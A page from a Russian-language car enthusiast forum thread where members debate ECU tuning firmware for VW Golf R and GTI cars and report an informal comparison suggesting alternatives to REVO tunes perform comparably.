+ Ответить в теме
Страница 49 из 81 ПерваяПервая ... 39 47 48 49 50 51 59 ... ПоследняяПоследняя
Показано с 481 по 490 из 809

Тема: чип vs чип (подход, особенности, проблемы и т.п.)

GTI-Racing JUICE is on a distinguished road Аватар для JUICE
    Машина
    VW Golf
    Тема про чипы Гольф Р погрязла в чипах всего семейства VAG... Короч, подведя итог... Никто на Р-ках, кроме Рево другие чипы не катал по человечески и нормально не настроился. Без альтернативно - все выбрали Рево?

GTI-Racing d24enis is on a distinguished road Аватар для d24enis
    Машина
    GTI35LE
    немного поспорили , все нормально , сочувствую BigHit я с 5R32 на ручке пересел на М3 в 92 кузове но из за финансов теперь на GTI , 6 горшков 2 турбины у бмв и задний привод каким чипом можно достать те ощущения от 335 ?
    Последний раз редактировалось d24enis; 14.07.2012 в 19:06.

GTI-Racing BorisRT is on a distinguished road Аватар для BorisRT
    Машина
    Golf R
    Всем приготовиться к великому обсеру Рево))

GTI-Racing JUICE is on a distinguished road Аватар для JUICE
    Машина
    VW Golf
    Борис, будем корректны... Договорились же... Так нельзя

Сегодня просто выяснилось, что REVo не так уж и "валит" как многие думают. И есть реальные альтернативы, которые не хуже и многим не менее известны.
    Поясню, с некоторых пор сложилось мнение, что кроме REVo в VAG сообществе больше ничего не едет! REVo всех проезжает и уигрывает во всех дисциплинах! И на любых автомобилях семейства VAG! Тому подтверждением послужили массы видео в основном в российской части YouTub'а, где автомобили прошитые REVo назовем это "разрывали" конкурентов многими "кутузовами". Данный факт никем не ставился под сомнение, ибо доказательная база в виде множества видео говорила сама за себя. Но нашлись люди, которые поставили под сомнение вышеперечисленные факты. В частности, я был одним из этих людей. Лично мне стало интересно, а в чем загадка и все же возможна ли альтернатива. Другие заинтересованные люди, если пожелают выскажутся сами, если нет, то это их право. Я рассуждал так, ну не может быть, чтобы многие умы индустрии тюнинга в одночасье "слили" REVo и поглупели. Ну я бы понял, если бы машины чипованные другими ателье ехали ровно например, но не постоянно же сливали. Фантастика, короч. В итоге, был взят за основу ныне популярный Гольф Р. Автомобиль полностью стоковый, новый с небольшим пробегом. Данный автомобиль был помещен на мощностной стенд и на нем настроен. Благодаря умам двух известных в определенных кругах людей. Автомобиль был настроен не на режим, "всех рву и после этого взрываюсь", а на повседневную эксплуатацию "без последствий". Причем его можно было настроить и позлее, но цели такой не было. В процессе настройки выяснились слабые и сильные стороны данного "драндулета", впрочем чудес не случилось и все было давно знакомо и известно. Ну и переходим к сенсациями. Сегодня (уже вчера) благодаря коллективу заинтересованных и не знакомых до этого людей, по удачному стечению обстоятельств произошла встреча и "мини покатушки" на дороге. Удалось встретиться двум полностью идентичным автомобилям, автомобилям не обремененным тюнингом, но с залитыми альтернативными прошивками мозгов от различных тюнинг ателье. В результате встречи обоюдно, при свидетелях выяснилось, что альтернативы едут и едут, назовем это - динамичней! Ну и, ну никак не хуже. Т. е. опытным путем, выяснилось, что "не REVo единым жив человек". Даже с учетом корявых стартов и прочего. Всем мир! Рево - валит, но не только оно (или он, простите я не знаю).

А выбор чипа, личное дело каждого!

Будет интересно и в дальнейшем посмотреть на автомобили в одинаковых конфигах в процессе тюнинга. Закупаемся насосами! )))

Ну и лично от меня благодарность за проделанную работу, "некоему" Кириллу и "некоему" Сергею. Спасибо ребята, за ваши труды. Результат говорит сам за себя.

Супер Модератор Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Spaceman is a name known to all Аватар для Spaceman
    Машина
    GTI Overload
    Не удивлен
    Последний раз редактировалось Spaceman; 23.07.2012 в 08:12.
    Golf V GTI Overload почти сток...

GTI-Racing mas1er is on a distinguished road Аватар для mas1er
    Машина
    mk4
    занавес
    '02mk4 GTi st1 * Forge007 DV * WEITEC coilovers * 312 * R32 sway bar продан
    '12mk6 GTi MT APR * Carbonio intake * Neuspeed Turbo Outlet pipe * Eibach Sportline

GTI-Racing Rugby 14 will become famous soon enough Rugby 14 will become famous soon enough Аватар для Rugby 14
    Машина
    .:R MkVI
    Цитата Сообщение от JUICE Посмотреть сообщение
    Борис, будем корректны... Договорились же... Так нельзя

Сегодня просто выяснилось, что REVo не так уж и "валит" как многие думают. И есть реальные альтернативы, которые не хуже и многим не менее известны.
    Поясню, с некоторых пор сложилось мнение, что кроме REVo в VAG сообществе больше ничего не едет! REVo всех проезжает и уигрывает во всех дисциплинах! И на любых автомобилях семейства VAG! Тому подтверждением послужили массы видео в основном в российской части YouTub'а, где автомобили прошитые REVo назовем это "разрывали" конкурентов многими "кутузовами". Данный факт никем не ставился под сомнение, ибо доказательная база в виде множества видео говорила сама за себя. Но нашлись люди, которые поставили под сомнение вышеперечисленные факты. В частности, я был одним из этих людей. Лично мне стало интересно, а в чем загадка и все же возможна ли альтернатива. Другие заинтересованные люди, если пожелают выскажутся сами, если нет, то это их право. Я рассуждал так, ну не может быть, чтобы многие умы индустрии тюнинга в одночасье "слили" REVo и поглупели. Ну я бы понял, если бы машины чипованные другими ателье ехали ровно например, но не постоянно же сливали. Фантастика, короч. В итоге, был взят за основу ныне популярный Гольф Р. Автомобиль полностью стоковый, новый с небольшим пробегом. Данный автомобиль был помещен на мощностной стенд и на нем настроен. Благодаря умам двух известных в определенных кругах людей. Автомобиль был настроен не на режим, "всех рву и после этого взрываюсь", а на повседневную эксплуатацию "без последствий". Причем его можно было настроить и позлее, но цели такой не было. В процессе настройки выяснились слабые и сильные стороны данного "драндулета", впрочем чудес не случилось и все было давно знакомо и известно. Ну и переходим к сенсациями. Сегодня (уже вчера) благодаря коллективу заинтересованных и не знакомых до этого людей, по удачному стечению обстоятельств произошла встреча и "мини покатушки" на дороге. Удалось встретиться двум полностью идентичным автомобилям, автомобилям не обремененным тюнингом, но с залитыми альтернативными прошивками мозгов от различных тюнинг ателье. В результате встречи обоюдно, при свидетелях выяснилось, что альтернативы едут и едут, назовем это - динамичней! Ну и, ну никак не хуже. Т. е. опытным путем, выяснилось, что "не REVo единым жив человек". Даже с учетом корявых стартов и прочего. Всем мир! Рево - валит, но не только оно (или он, простите я не знаю).

А выбор чипа, личное дело каждого!

Будет интересно и в дальнейшем посмотреть на автомобили в одинаковых конфигах в процессе тюнинга. Закупаемся насосами! )))

Ну и лично от меня благодарность за проделанную работу, "некоему" Кириллу и "некоему" Сергею. Спасибо ребята, за ваши труды. Результат говорит сам за себя.
    если тому самому Кириллу, то я вуапще не удивлен. в след году собираюсь к нему )
    Tough Guys Don`t Dance ©

.:Revo St.2+

GTI-Racing Neonsly will become famous soon enough Neonsly will become famous soon enough Аватар для Neonsly
    Машина
    mk6 GTI
    Прочитал все, но думаю можно было в 2 предложения уместить :)
    Evil Rabbit прыгает по drive2

K04, Milltek Sport Exhaust, Sachs Perfomance Clutch, APR intake, S3 Intercooler, Ferodo 2500 + DBA 4000, Revo St.3, B6 sport + Euro Springs. Peloquin LSD. Винил "Evil Rabit". Polk Audio. Салон кожа + алькантара.

III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Машина
    Nissan Quest
    А что, СергейНик с turborabbit`ом работает уже? :)
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

GTI-Racing Cabal is on a distinguished road Аватар для Cabal
    Машина
    Skoda Octavia FL RS k04 APR
    Цитата Сообщение от Гера Посмотреть сообщение
    А что, СергейНик с turborabbit`ом работает уже? :)
    А это разве было секретом? ))

+ Ответить в теме
Страница 49 из 81 ПерваяПервая ... 39 47 48 49 50 51 59 ... ПоследняяПоследняя